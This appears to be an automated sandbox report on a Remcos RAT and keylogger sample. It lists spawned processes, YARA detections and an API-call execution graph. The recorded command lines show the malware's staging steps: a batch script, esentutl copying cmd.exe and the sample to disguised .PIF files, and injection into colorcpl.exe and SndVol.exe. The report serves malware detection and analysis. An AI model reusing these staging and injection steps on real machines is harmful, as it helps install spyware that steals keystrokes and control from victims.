                                                        Commandline:"C:\Users\user\Desktop\XjPA2pnUhC.exe"
                                                        Imagebase:0x400000
                                                        File size:1'088'512 bytes
                                                        MD5 hash:BBF710C83246092A538128620853D4FD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:03:34:38
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:03:34:38
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:03:34:39
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                        Imagebase:0xc40000
                                                        File size:352'768 bytes
                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:03:34:40
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\XjPA2pnUhC.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o
                                                        Imagebase:0xc40000
                                                        File size:352'768 bytes
                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:03:34:40
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:03:34:40
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\colorcpl.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\colorcpl.exe
                                                        Imagebase:0xf70000
                                                        File size:86'528 bytes
                                                        MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:9
                                                        Start time:03:34:50
                                                        Start date:25/09/2024
                                                        Path:C:\Users\Public\Libraries\Qzzgbhha.PIF
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\Public\Libraries\Qzzgbhha.PIF"
                                                        Imagebase:0x400000
                                                        File size:1'088'512 bytes
                                                        MD5 hash:BBF710C83246092A538128620853D4FD
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:Borland Delphi
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 32%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:03:34:51
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\SndVol.exe
                                                        Imagebase:0x260000
                                                        File size:226'712 bytes
                                                        MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:03:34:58
                                                        Start date:25/09/2024
                                                        Path:C:\Users\Public\Libraries\Qzzgbhha.PIF
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\Public\Libraries\Qzzgbhha.PIF"
                                                        Imagebase:0x400000
                                                        File size:1'088'512 bytes
                                                        MD5 hash:BBF710C83246092A538128620853D4FD
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:Borland Delphi
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:03:34:59
                                                        Start date:25/09/2024
                                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\SndVol.exe
                                                        Imagebase:0x260000
                                                        File size:226'712 bytes
                                                        MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2330151215.000000002B797000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:6.6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:5.2%
                                                          Total number of Nodes:1555
                                                          Total number of Limit Nodes:15
                                                          execution_graph 71969 291c350 71972 290f7c8 71969->71972 71973 290f7d0 71972->71973 71973->71973 71974 290f7d7 71973->71974 74392 29088b8 LoadLibraryW 71974->74392 71976 290f7f1 74397 28f2ee0 QueryPerformanceCounter 71976->74397 71978 290f7f6 71979 290f800 InetIsOffline 71978->71979 71980 290f80a 71979->71980 71981 290f81b 71979->71981 74409 28f4530 71980->74409 71982 28f4530 11 API calls 71981->71982 71984 290f819 71982->71984 74400 28f4860 71984->74400 74415 2908274 74392->74415 74394 29088f1 74426 2907d78 74394->74426 74398 28f2eed 74397->74398 74399 28f2ef8 GetTickCount 74397->74399 74398->71978 74399->71978 74401 28f4871 74400->74401 74402 28f48ae 74401->74402 74403 28f4897 74401->74403 74405 28f45a0 11 API calls 74402->74405 74404 28f4bcc 11 API calls 74403->74404 74407 28f48a4 74404->74407 74405->74407 74406 28f48df 74407->74406 74408 28f4530 11 API calls 74407->74408 74408->74406 74410 28f4534 74409->74410 74411 28f4544 74409->74411 74410->74411 74413 28f45a0 11 API calls 74410->74413 74412 28f4572 74411->74412 74500 28f2c2c 11 API calls 74411->74500 74412->71984 74413->74411 74416 28f4530 11 API calls 74415->74416 74417 2908299 74416->74417 74440 290798c 74417->74440 74421 29082b3 74422 29082bb GetModuleHandleW GetProcAddress GetProcAddress 74421->74422 74423 29082ee 74422->74423 74461 28f4500 74423->74461 74427 28f4530 11 API calls 74426->74427 74428 2907d9d 74427->74428 74429 290798c 12 API calls 74428->74429 74430 2907daa 74429->74430 74431 28f47ec 11 API calls 74430->74431 74432 2907dba 74431->74432 74489 29081cc 74432->74489 74435 2908274 15 API calls 74436 2907dd3 NtWriteVirtualMemory 74435->74436 74437 2907dff 74436->74437 74438 28f4500 11 API calls 74437->74438 74439 2907e0c FreeLibrary 74438->74439 74439->71976 74441 290799d 74440->74441 74465 28f4bcc 74441->74465 74443 2907a19 74446 28f47ec 74443->74446 74444 29079ad 74444->74443 74474 28fbabc CharNextA 74444->74474 74447 28f4851 74446->74447 74448 28f47f0 74446->74448 74449 28f47f8 74448->74449 74450 28f4530 74448->74450 74449->74447 74451 28f4807 74449->74451 74454 28f4530 11 API calls 74449->74454 74453 28f45a0 11 API calls 74450->74453 74456 28f4544 74450->74456 74455 28f45a0 11 API calls 74451->74455 74452 28f4572 74452->74421 74453->74456 74454->74451 74458 28f4821 74455->74458 74456->74452 74487 28f2c2c 11 API calls 74456->74487 74459 28f4530 11 API calls 74458->74459 74460 28f484d 74459->74460 74460->74421 74462 28f4506 74461->74462 74463 28f452c 74462->74463 74488 28f2c2c 11 API calls 74462->74488 74463->74394 74466 28f4bd9 74465->74466 74471 28f4c09 74465->74471 74468 28f4c02 74466->74468 74469 28f4be5 74466->74469 74476 28f45a0 74468->74476 74475 28f2c44 11 API calls 74469->74475 74481 28f44dc 74471->74481 74472 28f4bf3 74472->74444 74474->74444 74475->74472 74477 28f45c8 74476->74477 74478 28f45a4 74476->74478 74477->74471 74485 28f2c10 11 API calls 74478->74485 74480 28f45b1 74480->74471 74482 28f44fd 74481->74482 74483 28f44e2 74481->74483 74482->74472 74483->74482 74486 28f2c2c 11 API calls 74483->74486 74485->74480 74486->74482 74487->74452 74488->74462 74490 28f4530 11 API calls 74489->74490 74491 29081ef 74490->74491 74492 290798c 12 API calls 74491->74492 74493 29081fc 74492->74493 74494 2908204 GetModuleHandleA 74493->74494 74495 2908274 15 API calls 74494->74495 74496 2908215 GetModuleHandleA 74495->74496 74497 2908233 74496->74497 74498 28f44dc 11 API calls 74497->74498 74499 2907dcd 74498->74499 74499->74435 74500->74412 74501 28f4edc 74502 28f4ee9 74501->74502 74506 28f4ef0 74501->74506 74507 28f4c38 74502->74507 74513 28f4c50 74506->74513 74508 28f4c4c 74507->74508 74509 28f4c3c SysAllocStringLen 74507->74509 74508->74506 74509->74508 74510 28f4c30 74509->74510 74511 28f4f3c 74510->74511 74512 28f4f26 SysAllocStringLen 74510->74512 74511->74506 74512->74510 74512->74511 74514 28f4c5c 74513->74514 74515 28f4c56 SysFreeString 74513->74515 74515->74514 74516 2913e12 74517 28f4860 11 API calls 74516->74517 74518 2913e33 74517->74518 74519 2913e4b 74518->74519 74520 28f47ec 11 API calls 74519->74520 74521 2913e6a 74520->74521 74522 2913e82 74521->74522 76062 29089d0 74522->76062 74527 28f4860 11 API calls 74528 2913ee0 74527->74528 74529 2913eeb 74528->74529 74530 2913ef7 74529->74530 74531 28f4860 11 API calls 74530->74531 74532 2913f18 74531->74532 74533 2913f23 74532->74533 74534 2913f30 74533->74534 74535 28f47ec 11 API calls 74534->74535 74536 2913f4f 74535->74536 74537 2913f67 74536->74537 74538 29089d0 20 API calls 74537->74538 74539 2913f73 74538->74539 74540 28f4860 11 API calls 74539->74540 74541 2913f94 74540->74541 74542 2913f9f 74541->74542 74543 2913fac 74542->74543 74544 28f47ec 11 API calls 74543->74544 74545 2913fcb 74544->74545 74546 2913fe3 74545->74546 74547 29089d0 20 API calls 74546->74547 74548 2913fef 74547->74548 74549 28f4860 11 API calls 74548->74549 74550 2914010 74549->74550 74551 291401b 74550->74551 74552 2914028 74551->74552 74553 28f47ec 11 API calls 74552->74553 74554 2914047 74553->74554 74555 2914052 74554->74555 74556 291405f 74555->74556 74557 29089d0 20 API calls 74556->74557 74558 291406b 74557->74558 76082 290e358 74558->76082 74561 2914091 74562 29140a2 74561->74562 76087 290dc8c 74562->76087 74565 28f4860 11 API calls 74566 29140f1 74565->74566 74567 29140fc 74566->74567 74568 28f47ec 11 API calls 74567->74568 74569 2914128 74568->74569 74570 2914133 74569->74570 74571 29089d0 20 API calls 74570->74571 74572 291414c 74571->74572 74573 28f4860 11 API calls 74572->74573 74574 291416d 74573->74574 74575 28f47ec 11 API calls 74574->74575 74576 29141a4 74575->74576 74577 29141af 74576->74577 74578 29089d0 20 API calls 74577->74578 74579 29141c8 74578->74579 74580 29088b8 20 API calls 74579->74580 74581 29141cd 74580->74581 74582 29141d7 74581->74582 76102 290e678 74582->76102 74585 28f4860 11 API calls 74586 2914217 74585->74586 74587 291422f 74586->74587 74588 28f47ec 11 API calls 74587->74588 74589 291424e 74588->74589 74590 2914259 74589->74590 74591 29089d0 20 API calls 74590->74591 74592 2914272 Sleep 74591->74592 74593 28f4860 11 API calls 74592->74593 74594 291429d 74593->74594 74595 29142b5 74594->74595 74596 28f47ec 11 API calls 74595->74596 74597 29142d4 74596->74597 74598 29142df 74597->74598 76241 28f46d4 74598->76241 76063 29089e4 76062->76063 76064 29081cc 17 API calls 76063->76064 76065 2908a1d 76064->76065 76066 2908274 15 API calls 76065->76066 76067 2908a36 76066->76067 76068 2907d78 18 API calls 76067->76068 76069 2908a95 76068->76069 76243 2908338 76069->76243 76072 2908abc 76073 28f4500 11 API calls 76072->76073 76074 2908ac9 76073->76074 76075 290f094 76074->76075 76080 290f0b9 76075->76080 76076 290f0e5 76077 28f44dc 11 API calls 76076->76077 76079 290f0fa 76077->76079 76079->74527 76080->76076 76255 28f46c4 11 API calls 76080->76255 76256 28f4530 11 API calls 76080->76256 76083 28f4bcc 11 API calls 76082->76083 76084 290e370 76083->76084 76085 290e391 76084->76085 76257 28f49f8 76084->76257 76085->74561 76088 290dca2 76087->76088 76264 28f4f20 76088->76264 76090 290dcaa 76091 290dcca RtlDosPathNameToNtPathName_U 76090->76091 76268 290dbdc 76091->76268 76093 290dce6 NtCreateFile 76094 290dd11 76093->76094 76095 28f49f8 11 API calls 76094->76095 76096 290dd23 NtWriteFile NtClose 76095->76096 76097 290dd4d 76096->76097 76269 28f4c60 76097->76269 76100 28f44dc 11 API calls 76101 290dd5d Sleep 76100->76101 76101->74565 76103 290e681 76102->76103 76103->76103 76104 28f4860 11 API calls 76103->76104 76105 290e6ca 76104->76105 76106 28f47ec 11 API calls 76105->76106 76107 290e6ef 76106->76107 76108 29089d0 20 API calls 76107->76108 76109 290e70a 76108->76109 76110 28f4860 11 API calls 76109->76110 76111 290e723 76110->76111 76112 28f47ec 11 API calls 76111->76112 76113 290e748 76112->76113 76114 29089d0 20 API calls 76113->76114 76115 290e763 76114->76115 76116 28f4860 11 API calls 76115->76116 76117 290e77c 76116->76117 76118 28f47ec 11 API calls 76117->76118 76119 290e7a1 76118->76119 76120 29089d0 20 API calls 76119->76120 76121 290e7bc 76120->76121 76122 28f4860 11 API calls 76121->76122 76123 290e7ee 76122->76123 76124 29089d0 20 API calls 76123->76124 76125 290e838 76124->76125 76126 28f4860 11 API calls 76125->76126 76127 290e86f 76126->76127 76128 28f47ec 11 API calls 76127->76128 76129 290e894 76128->76129 76130 29089d0 20 API calls 76129->76130 76131 290e8af 76130->76131 76132 28f4860 11 API calls 76131->76132 76133 290e8c8 76132->76133 76134 28f47ec 11 API calls 76133->76134 76135 290e8ed 76134->76135 76136 29089d0 20 API calls 76135->76136 76137 290e908 76136->76137 76138 28f4860 11 API calls 76137->76138 76139 290e921 76138->76139 76140 28f47ec 11 API calls 76139->76140 76141 290e946 76140->76141 76142 29089d0 20 API calls 76141->76142 76143 290e961 76142->76143 76272 28f7f2c 76143->76272 76145 290e985 76276 2908788 76145->76276 76148 28f4860 11 API calls 76149 290ea0a 76148->76149 76150 28f47ec 11 API calls 76149->76150 76151 290ea3b 76150->76151 76152 29089d0 20 API calls 76151->76152 76153 290ea5f 76152->76153 76154 28f4860 11 API calls 76153->76154 76155 290ea7b 76154->76155 76156 28f47ec 11 API calls 76155->76156 76157 290eaac 76156->76157 76158 29089d0 20 API calls 76157->76158 76159 290ead0 76158->76159 76160 28f4860 11 API calls 76159->76160 76161 290eaec 76160->76161 76162 28f47ec 11 API calls 76161->76162 76163 290eb1d 76162->76163 76164 29089d0 20 API calls 76163->76164 76165 290eb41 76164->76165 76166 28f4860 11 API calls 76165->76166 76167 290eb5d 76166->76167 76168 28f47ec 11 API calls 76167->76168 76169 290eb7b 76168->76169 76288 290894c LoadLibraryW 76169->76288 76172 28f4860 11 API calls 76173 290ebac 76172->76173 76174 28f47ec 11 API calls 76173->76174 76175 290ebca 76174->76175 76176 290894c 21 API calls 76175->76176 76177 290ebdf 76176->76177 76178 28f4860 11 API calls 76177->76178 76179 290ebfb 76178->76179 76180 28f47ec 11 API calls 76179->76180 76181 290ec19 76180->76181 76182 290894c 21 API calls 76181->76182 76183 290ec2e 76182->76183 76184 28f4860 11 API calls 76183->76184 76185 290ec4a 76184->76185 76186 28f47ec 11 API calls 76185->76186 76187 290ec68 76186->76187 76188 290894c 21 API calls 76187->76188 76189 290ec7d 76188->76189 76190 290ec87 76189->76190 76192 290eee2 76189->76192 76191 28f4860 11 API calls 76190->76191 76197 290eca3 76191->76197 76193 28f4500 11 API calls 76192->76193 76194 290eeff 76193->76194 76195 28f4c60 SysFreeString 76194->76195 76196 290ef0a 76195->76196 76198 28f4500 11 API calls 76196->76198 76200 28f47ec 11 API calls 76197->76200 76199 290ef1a 76198->76199 76201 28f4c60 SysFreeString 76199->76201 76204 290ecd4 76200->76204 76202 290ef22 76201->76202 76203 28f4500 11 API calls 76202->76203 76205 290ef2f 76203->76205 76206 29089d0 20 API calls 76204->76206 76205->74585 76207 290ecf8 76206->76207 76208 28f4860 11 API calls 76207->76208 76209 290ed14 76208->76209 76210 28f47ec 11 API calls 76209->76210 76211 290ed45 76210->76211 76212 29089d0 20 API calls 76211->76212 76213 290ed69 WaitForSingleObject CloseHandle CloseHandle 76212->76213 76214 28f4860 11 API calls 76213->76214 76215 290eda0 76214->76215 76216 28f47ec 11 API calls 76215->76216 76217 290edbe 76216->76217 76218 290894c 21 API calls 76217->76218 76219 290edd3 76218->76219 76220 28f4860 11 API calls 76219->76220 76221 290edef 76220->76221 76222 28f47ec 11 API calls 76221->76222 76223 290ee0d 76222->76223 76224 290894c 21 API calls 76223->76224 76225 290ee22 76224->76225 76226 28f4860 11 API calls 76225->76226 76227 290ee3e 76226->76227 76228 28f47ec 11 API calls 76227->76228 76229 290ee5c 76228->76229 76230 290894c 21 API calls 76229->76230 76231 290ee71 76230->76231 76232 28f4860 11 API calls 76231->76232 76233 290ee8d 76232->76233 76234 28f47ec 11 API calls 76233->76234 76235 290eeab 76234->76235 76236 290894c 21 API calls 76235->76236 76237 290eec0 76236->76237 76238 290894c 21 API calls 76237->76238 76239 290eed1 76238->76239 76240 290894c 21 API calls 76239->76240 76240->76192 76242 28f46da 76241->76242 76244 28f4530 11 API calls 76243->76244 76245 290835b 76244->76245 76246 28f4860 11 API calls 76245->76246 76247 290837a 76246->76247 76248 29081cc 17 API calls 76247->76248 76249 290838d 76248->76249 76250 2908274 15 API calls 76249->76250 76251 2908393 FlushInstructionCache 76250->76251 76252 29083b9 76251->76252 76253 28f44dc 11 API calls 76252->76253 76254 29083c1 FreeLibrary 76253->76254 76254->76072 76255->76080 76256->76080 76258 28f49ac 76257->76258 76259 28f45a0 11 API calls 76258->76259 76261 28f49e7 76258->76261 76260 28f49c3 76259->76260 76260->76261 76263 28f2c2c 11 API calls 76260->76263 76261->76084 76263->76261 76265 28f4f3c 76264->76265 76266 28f4f26 SysAllocStringLen 76264->76266 76265->76090 76266->76265 76267 28f4c30 76266->76267 76267->76264 76268->76093 76270 28f4c66 SysFreeString 76269->76270 76271 28f4c74 76269->76271 76270->76271 76271->76100 76273 28f7f3f 76272->76273 76295 28f4a00 76273->76295 76277 28f4530 11 API calls 76276->76277 76278 29087ab 76277->76278 76279 28f4860 11 API calls 76278->76279 76280 29087ca 76279->76280 76281 29081cc 17 API calls 76280->76281 76282 29087dd 76281->76282 76283 2908274 15 API calls 76282->76283 76284 29087e3 CreateProcessAsUserW 76283->76284 76285 2908827 76284->76285 76286 28f44dc 11 API calls 76285->76286 76287 290882f 76286->76287 76287->76148 76289 2908973 GetProcAddress 76288->76289 76290 29089bb 76288->76290 76291 29089b0 FreeLibrary 76289->76291 76292 290898d 76289->76292 76290->76172 76291->76290 76293 2907d78 18 API calls 76292->76293 76294 29089a5 76293->76294 76294->76291 76296 28f4a32 76295->76296 76298 28f4a05 76295->76298 76297 28f44dc 11 API calls 76296->76297 76299 28f4a28 76297->76299 76298->76296 76300 28f4a19 76298->76300 76299->76145 76302 28f45cc 76300->76302 76303 28f45a0 11 API calls 76302->76303 76304 28f45dc 76303->76304 76305 28f44dc 11 API calls 76304->76305 76306 28f45f4 76305->76306 76306->76299 76307 28f1c6c 76308 28f1c7c 76307->76308 76309 28f1d04 76307->76309 76310 28f1c89 76308->76310 76311 28f1cc0 76308->76311 76312 28f1d0d 76309->76312 76313 28f1f58 76309->76313 76315 28f1c94 76310->76315 76355 28f1724 76310->76355 76314 28f1724 10 API calls 76311->76314 76317 28f1d25 76312->76317 76330 28f1e24 76312->76330 76316 28f1fec 76313->76316 76319 28f1fac 76313->76319 76320 28f1f68 76313->76320 76338 28f1cd7 76314->76338 76318 28f1d2c 76317->76318 76324 28f1d48 76317->76324 76327 28f1dfc 76317->76327 76325 28f1fb2 76319->76325 76328 28f1724 10 API calls 76319->76328 76326 28f1724 10 API calls 76320->76326 76322 28f1e7c 76323 28f1724 10 API calls 76322->76323 76340 28f1e95 76322->76340 76342 28f1f2c 76323->76342 76331 28f1d79 Sleep 76324->76331 76344 28f1d9c 76324->76344 76339 28f1f82 76326->76339 76333 28f1724 10 API calls 76327->76333 76332 28f1fc1 76328->76332 76329 28f1cb9 76330->76322 76334 28f1e55 Sleep 76330->76334 76330->76340 76336 28f1d91 Sleep 76331->76336 76331->76344 76349 28f1fa7 76332->76349 76350 28f1a8c 8 API calls 76332->76350 76345 28f1e05 76333->76345 76334->76322 76335 28f1e6f Sleep 76334->76335 76335->76330 76336->76324 76337 28f1ca1 76337->76329 76379 28f1a8c 76337->76379 76343 28f1a8c 8 API calls 76338->76343 76346 28f1cfd 76338->76346 76347 28f1a8c 8 API calls 76339->76347 76339->76349 76342->76340 76348 28f1a8c 8 API calls 76342->76348 76343->76346 76352 28f1a8c 8 API calls 76345->76352 76354 28f1e1d 76345->76354 76347->76349 76351 28f1f50 76348->76351 76353 28f1fe4 76350->76353 76352->76354 76356 28f1968 76355->76356 76359 28f173c 76355->76359 76357 28f1938 76356->76357 76358 28f1a80 76356->76358 76365 28f1947 Sleep 76357->76365 76372 28f1986 76357->76372 76360 28f1a89 76358->76360 76361 28f1684 VirtualAlloc 76358->76361 76366 28f17cb Sleep 76359->76366 76368 28f174e 76359->76368 76360->76337 76363 28f16bf 76361->76363 76364 28f16af 76361->76364 76362 28f175d 76362->76337 76363->76337 76396 28f1644 76364->76396 76370 28f195d Sleep 76365->76370 76365->76372 76366->76368 76371 28f17e4 Sleep 76366->76371 76367 28f182c 76378 28f1838 76367->76378 76402 28f15cc 76367->76402 76368->76362 76368->76367 76373 28f180a Sleep 76368->76373 76370->76357 76371->76359 76374 28f15cc VirtualAlloc 76372->76374 76376 28f19a4 76372->76376 76373->76367 76375 28f1820 Sleep 76373->76375 76374->76376 76375->76368 76376->76337 76378->76337 76380 28f1b6c 76379->76380 76381 28f1aa1 76379->76381 76382 28f1aa7 76380->76382 76385 28f16e8 76380->76385 76381->76382 76383 28f1b13 Sleep 76381->76383 76384 28f1ab0 76382->76384 76388 28f1b4b Sleep 76382->76388 76393 28f1b81 76382->76393 76383->76382 76387 28f1b2d Sleep 76383->76387 76384->76329 76386 28f1c66 76385->76386 76389 28f1644 2 API calls 76385->76389 76386->76329 76387->76381 76391 28f1b61 Sleep 76388->76391 